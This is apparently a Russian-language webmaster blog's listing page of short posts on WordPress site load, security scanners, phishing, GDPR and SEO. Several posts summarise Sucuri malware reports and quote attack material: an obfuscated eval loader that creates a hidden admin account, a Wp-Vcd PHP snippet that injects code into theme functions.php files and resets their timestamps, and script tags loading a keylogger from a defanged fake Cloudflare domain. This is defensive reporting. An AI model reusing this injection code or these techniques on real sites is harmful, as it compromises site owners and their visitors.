БЛОГ


За прошлую неделю было несколько интересных обращений по чрезмерной нагрузке на сайт.

Причиной, как выяснилось, был поисковый трафик создаваемый Googlebot.  

Все сайты, попавшие под этот тип атаки, были построены на Wordpress, и во всех случаях не использовались канонические url.

Опубликовано в БЛОГ

Компания Sucuri специализирующаяся на безопасности сайтов на Wordpress, обновила собственный бесплатный сканер сайтов  SiteCheck.

SiteCheck является бесплатным онлайн инструментом для поиска вредоносных скриптов на веб ресурсах и внесения сайта в черный список.

В новой версии был не только изменен дизайн, но и по заявлению разработчиков почти на 600% ускорена скорость работы сканера, а также внесены новые возможности для проверки.

Опубликовано в БЛОГ

Давно не писал, лето, знаете ли

По сообщению компаний, работающих в сфере IT безопасности, с начал сентября зафиксирована необычная технология кражи паролей Wordpress при помощи рассылки фишинговых писем.

Поддельное письмо выглядит как стандартное сообщение рассылки wordpress.org администраторам сайтов о необходимости обновления, стоит заметить, что  используемое оформление  соответствует устаревшим версиям CMS.

Опубликовано в БЛОГ

С мая этого года в Европе вводятся новые правила обработки персональных данных.

О самих правилах распространяться не имеет смысла, о них и так много было сказано.

Остановимся на основных требованиях для вебмастера:

Любой зарегистрировшийся посетитель должен иметь возможность удалить свой аккаунт вместе со всеми данными.

Нельзя собирать данные сверх того, что нужно. Поясню: если у вас интернет-магазин, не стоит требовать данные, сверх тех, которые нужны для доставки товара. Как, например, возраст, пол и так далее.

Посетитель должен иметь возможность исправить свои регистрационные данные.

На мой взгляд, наиболее оптимальным решением будет сделать вход через Open ID, в  этом случае вы также снимаете с себя ответственность за хранение данных, что тоже особо обговаривается в новом регламенте.  

Полный текст можно прочитать тут.

Опубликовано в БЛОГ

В этом месяце специалистами компании Sucuri необычный способ распространения зловредного кода через JavaScript из браузера посетителя. Хотя используется давно известная уязвимость не обновлённой темы News Magazine Newspaper , но метод заслуживает описания.

На уязвимые сайты загружается вредоносный код:

eval (String.fromCharCode (118, 97, 114, 32, 115, 115, 99 ...

После того, как посетитель заходит на зараженный сайт, Javascript проверяет, зарегистрирован ли посетитель в качестве администратора, обратившись к файлу /wp-admin/user-new.php в теневом режиме. Если пользователь является администратором, он создает пользователя с именем simple001 и с электронной почтой simple @ simplesite .com  с правами администратора.

Если посетитель не зарегистрирован как admin, javascript проверяет, является ли это первым посещением за последние десять часов (проверяя файл cookie checkmeonce), а затем перенаправляет на адрес hxxps: //for.stringengines [.] Com /sp.php?at=57&bc=345&rps=5467854&sty=457&get=75 .

Этот URL-адрес промежуточный в  цепочке перенаправления на фишинговые и сайты рекламного содержания. Перенаправления, как правило, на один и тот же сайт делается один раз, чаще всего на домены в зоне  .tk обозначенными как  «техническая поддержка» и случайными символами в имени домена, такими как 3cal1ingc0nstant31112123 [.] Tk или techsupport60512123456 [.] Tk .

Опубликовано в БЛОГ

Новая атака зафиксированная в конце ноября. Для атаки используется уже известный Wp-Vcd yj но методы распространения претерпели некоторый изменения.

Так с помощью кода:

if ($ content = file_get_contents ($ themes. DIRECTORY_SEPARATOR. $ _. DIRECTORY_SEPARATOR. 'functions.php')) {
  if (strpos ($ content, 'WP_V_CD') === false) {
  $ content = $ install_code.  $ content;
  @file_put_contents ($ themes. DIRECTORY_SEPARATOR. $ _. DIRECTORY_SEPARATOR. 'functions.php', $ content);
  touch ($ themes. DIRECTORY_SEPARATOR. $ _. DIRECTORY_SEPARATOR. 'functions.php', $ time);
  }
  else {$ ping = false;  }
  }

сбрасывается дата изменения файла,  затем в базу загружается содержимое удаленного txt-файла с  именами хостов и паролями инъекций кода.

Опубликовано в БЛОГ

К вредоносному скрипту криптомайнинга cloudflare.solutions, который несколько недель назад был обнаружен специалистами Sucuri, добавлена новая функция кейлогера.

Вводная часть этой вредоносной программы вообще не изменилась, и использует function.php , чтобы вызвать следующие сценарии на страницах WordPress:

 

<script type = 'text / javascript' src = 'hxxp: // cloudflare [.] solutions /ajax/libs/reconnecting-websocket/1.0.0/reconnecting-websocket.js'> </ script>

 <script type = 'text / javascript' src = 'hxxp: // cloudflare [.] solutions /ajax/libs/cors/cors.js'> </ script>

 

URL-адреса сценариев также совпадают, однако они используют поддельный домен CloudFlare. Первая  (reconnecting-websocket.js) по-прежнему загружает копию законной библиотеки ReconnectingWebSocket .

Основное изменение - скрипт cors.js. Теперь, после его декодирования там нет абсолютно подозрительного кода. Также скрипт загружает Яндекс Метрику, скорее всего, это делается для отслеживания зараженных сайтов. Кстати, идентификатор  этого Яндекс скрипта - 43930119 - его можно найти в HTML-коде главной страницы.

Опубликовано в БЛОГ

Многие владельцы сайтов на WordPress после добавления ресурса на Яндекс.Вебмастер встречают сообщение — "Отсутствуют мета-теги <description>". Что не очень хорошо сказывается на индексации. Разработчики знают об этой проблеме, но ничего предпринимают, ссылаясь на то, что мета-теги устарели, но нам в любом случае приходится придерживаться рекомендаций поисковых систем.

ошибка в Яндекс Вебмастер
Существует несколько способов решения этого требования

Первый, — правка исходного кода CMS, но на это у многих не хватает опыта, и к тому же после обновления системы измененные файлы могут быть заменены на оригинальные.

Второй, — установка плагина. Конечно, установка дополнительных плагинов замедляет работу системы, в плагинах находят уязвимости, возрастает нагрузка на сервер и так далее, но это самый простой путь.

Опубликовано в БЛОГ

Сколько копий сломано на просторах сети в спорах о преимуществах этих CMS. К слову, споры идут с самого основания этих платформ, и только несколько раз мне встретились серьезные исследования, где автор провел множество тестов и доказывал свою позицию с цифрами в руках.

Данный материал не несет цели начать новые «холивары», а просто показать разницу этих систем. Никому же приходит в голову сравнивать, что лучше, зимняя обувь или летние шлепанцы. И даже если задать такой вопрос, - что лучше? То, как правило, последует уточнение – зимой или летом?

Точно так же и с этими CMS, при выборе нужно исходить из задачи, а не мыслить критериями нравиться-не нравится. Никому же не приходит в голову ходить летом на пляже в зимних кроссовках.

Опубликовано в БЛОГ

Не так давно была заявка по чрезмерной нагрузке на хостинг, все в общем банально, но может кому пригодится.

После получения паролей я первым делом зашел в админ панель сайта и открыл менеджер перенаправлений (Joomla) где сразу увидел бота. Бот сканировал разные ссылки в поисках уязвимости, причем даже не относящихся к данной CMS.

Опубликовано в БЛОГ
Страница 1 из 2